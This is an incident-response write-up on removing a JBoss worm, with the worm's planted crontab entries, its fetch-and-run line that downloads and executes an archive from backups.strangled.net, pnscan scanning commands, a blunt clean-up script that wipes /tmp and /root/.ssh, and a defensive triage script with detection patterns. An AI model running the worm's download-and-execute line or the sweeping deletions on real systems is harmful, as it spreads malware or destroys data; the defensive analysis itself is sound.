Steps to clean up the JBoss worm

Source: Internet
Author: User
Tags: jboss application server

Several hosts were affected. The application cannot currently be upgraded to a fixed JBoss (the upgrade fails testing), so for now the infection can only be cleaned up as a temporary measure.
1. The user that JBoss runs as (root, in this case) has cron jobs planted by the worm. The scheduled script uses wget to download the malware archive, unpacks it, and runs it:
[root@localhost tmp]# crontab -l
1 1 10 * * /root/.sysdbs
1 1 1 * * /bin/sh /root/.toor.sh
1 1 1 * * /root/.toor.sh
1 1 10 * * /root/.sysdbs
[root@localhost tmp]# more /root/.toor.sh
cd /tmp; wget http://backups.strangled.net/a.tar.gz; tar xzvf a.tar.gz; perl b.pl; python c.py
[root@localhost bin]# cd $JBOSS/bin
[root@localhost bin]# tar -tvf kisses.tar.gz
-rw-r--r-- toughc/toughc  1686 2002-03-26 00:39:14 Makefile
-rw-r--r-- toughc/toughc  3229 2002-03-26 00:34:47 bm.c
-rw-r--r-- toughc/toughc   460 2002-03-23 21:54:55 bm.h
-rw-r--r-- toughc/toughc  2939 2011-10-22 13:38:51 flu.pl
-rwxr-xr-x toughc/toughc  5598            06:25:47 install-sh
-rwxr-xr-x toughc/toughc   132 2002-03-22 23:05:15 ipsort
-rw-r--r-- toughc/toughc  4337 2011-10-22 13:38:01 linda.pl
-rw-r--r-- toughc/toughc 20211 2002-03-26 00:37:04 pnscan.c
-rw-r--r-- toughc/toughc    25            00:53:11 version.c
[root@localhost tmp]# find / -name pnscan
/tmp/zsa/pnscan
/usr/local/jboss-4.2.3.GA/bin/pnscan
[root@localhost tmp]# ps -ef | grep pnscan
root   754 21540 0 00:00:00 pts/3 grep pnscan
root  1003 32088 0 ?        00:00:00 sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n" -t 6500 150.34.0.0/16 80 > /tmp/sess_0088025413980486928597bf150
root  1009  1003 0 ?        00:00:00 ./pnscan -r JBoss -w HEAD / HTTP/1.0\r\n -t 6500 150.34.0.0/16 80
root 24553   527 0 ?        00:00:00 sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n" -t 6500 180.139.0.0/16 80 > /tmp/sess_0088025413980486928597bf180
root 24558 24553 0 ?        00:00:00 ./pnscan -r JBoss -w HEAD / HTTP/1.0\r\n -t 6500 180.139.0.0/16 80

2. Inspecting the dropped code shows why several pnscan processes and processes named /usr/share/jboss/tomcat appear on the system: the worm disguises itself as a /usr/share/jboss/tomcat process. It is actually started by the Perl script, and the processes can be spotted with top.
3. Clean up. Because the malware is still running, first kill its processes and only then delete its files. The clean-up script that was used is shown below.
[root@localhost tmp]# more /tmp/killpnscan.sh
#!/bin/sh
# Kill the worm's processes first. If pnscan survives, kill it by PID manually.
# Note: killall perl also kills any legitimate Perl processes on the host.
crontab -l
killall pnscan
killall perl

# Delete the worm's files from the JBoss bin directory
cd /usr/local/jboss-4.2.3.GA/bin/
rm -fr kiss*
rm -f flu.pl
rm -f bm.*
rm -f javadd.tar.gz
rm -f javadd.tar.gz*
rm -f lind?.pl
rm -f Makefile
rm -f nohup.out
rm -f pnscan*
rm -f version.*
rm -f install-sh
rm -f ipsort
rm -f jdb.tar.gz*
rm -f fly.pl
rm -f sysdbss*
rm -f treat.sh
rm -f /root/.ssh/*    # also removes root's own SSH keys; back up anything legitimate first
rm -f goodknight.*

# Delete the worm's files from the temporary directory
cd /tmp
rm -fr /tmp/.lime
rm -fr /tmp/za
rm -fr /tmp/zsa
rm -f /tmp/*          # wipes everything in /tmp, including other applications' files

rm -fr /tmp/flu
rm -fr /root/.sysdbs
rm -fr /root/.toor.sh

# Confirm the cleanup
killall pnscan
killall perl
ps -ef | grep pnscan
ps -ef | grep tomcat
crontab -r            # removes root's entire crontab, not only the worm's entries
4. At this point the worm's files have been removed. Because the worm downloads and runs its payload with wget, we also recommend uninstalling wget:
rpm -e wget
Note that this only takes away one download tool the worm happens to use; it does not close the hole the worm came in through, so the host can be re-infected until JBoss is upgraded to a version that is not affected.
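Before running a destructive script like the one above, it is worth triaging the same indicators the article lists with something less blunt than killing every Perl process and wiping /tmp and /root/.ssh. The helper below is an added example, not part of the original article or of the worm's own code. The indicator names (/root/.sysdbs, /root/.toor.sh, pnscan, flu.pl, linda.pl, the fake /usr/share/jboss/tomcat command line) are taken from the article; the `ps -eo pid,ppid,comm,args` column layout is assumed to be procps-style, and the crontab and process-table samples embedded in it are constructed for the demonstration, not real captures.

```shell
#!/bin/sh
# Added example: triage the worm's indicators before deleting anything.
# Indicator names come from the article; the sample data below is constructed.

# Print crontab lines matching the worm's persistence: hidden scripts in /root
# or a wget download. Reads crontab text on stdin.
worm_cron_lines() {
    grep -E '/root/\.(sysdbs|toor\.sh)|(^|[; ])wget '
}

# Print PIDs of processes that look like the worm. Input on stdin is the output
# of `ps -eo pid,ppid,comm,args`. Matches: the pnscan binary itself, perl running
# one of the dropped scripts, and anything whose command line is the fake
# /usr/share/jboss/tomcat. The article's JBoss lives in /usr/local, so a real
# process with that path is not expected on that host; adjust if yours differs.
# Unlike `killall perl`, unrelated Perl processes are left alone.
worm_pids() {
    awk '$3 == "pnscan" || /\/usr\/share\/jboss\/tomcat/ || ($3 == "perl" && /(flu|linda)\.pl/) { print $1 }'
}

# Count non-comment, non-blank entries in an authorized_keys file so planted keys
# can be reviewed instead of wiping /root/.ssh/* blindly. Prints 0 if absent.
count_authorized_keys() {
    if [ -r "$1" ]; then
        awk '!/^[ \t]*(#|$)/ { n++ } END { print n + 0 }' "$1"
    else
        echo 0
    fi
}

# Run against the live host: every user's crontab, the process table, root's keys.
triage_live() {
    echo "== suspicious crontab entries =="
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -u "$u" -l 2>/dev/null | worm_cron_lines | sed "s/^/$u: /"
    done
    echo "== suspicious PIDs (review them, then kill -TERM) =="
    ps -eo pid,ppid,comm,args | worm_pids
    echo "== entries in /root/.ssh/authorized_keys =="
    count_authorized_keys /root/.ssh/authorized_keys
}

# Constructed sample data modelled on the article's output (not real captures).
SAMPLE_CRON='1 1 10 * * /root/.sysdbs
1 1 1 * * /bin/sh /root/.toor.sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf'

SAMPLE_PS='  PID  PPID COMMAND         COMMAND
 1003 32088 sh              sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n" -t 6500 150.34.0.0/16 80
 1009  1003 pnscan          ./pnscan -r JBoss -w HEAD / HTTP/1.0\r\n -t 6500 150.34.0.0/16 80
 2001     1 perl            perl flu.pl
 2002     1 perl            /usr/bin/perl /usr/bin/spamd
 2003     1 perl            /usr/share/jboss/tomcat
  754 21540 grep            grep pnscan'

if [ "$1" = "--live" ]; then
    triage_live
else
    echo "== sample crontab hits =="
    printf '%s\n' "$SAMPLE_CRON" | worm_cron_lines
    echo "== sample worm PIDs =="
    printf '%s\n' "$SAMPLE_PS" | worm_pids
fi
```

Run without arguments to see the filters applied to the constructed samples (two cron hits; PIDs 1009, 2001 and 2003, while the spamd process and the grep are left alone); run with `--live` as root to apply the same filters to the actual host. The PID list is meant to be reviewed and then passed to kill by hand, which is also how the article suggests dealing with a pnscan that survives killall.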
Appendix: the versions affected by this worm are as follows:
 
JBoss Application Server (AS) 4.0.x
JBoss Communications Platform 1.2
JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0
JBoss Enterprise Portal Platform (EPP) 4.3
JBoss Enterprise Web Platform (EWP) 5.0
JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0

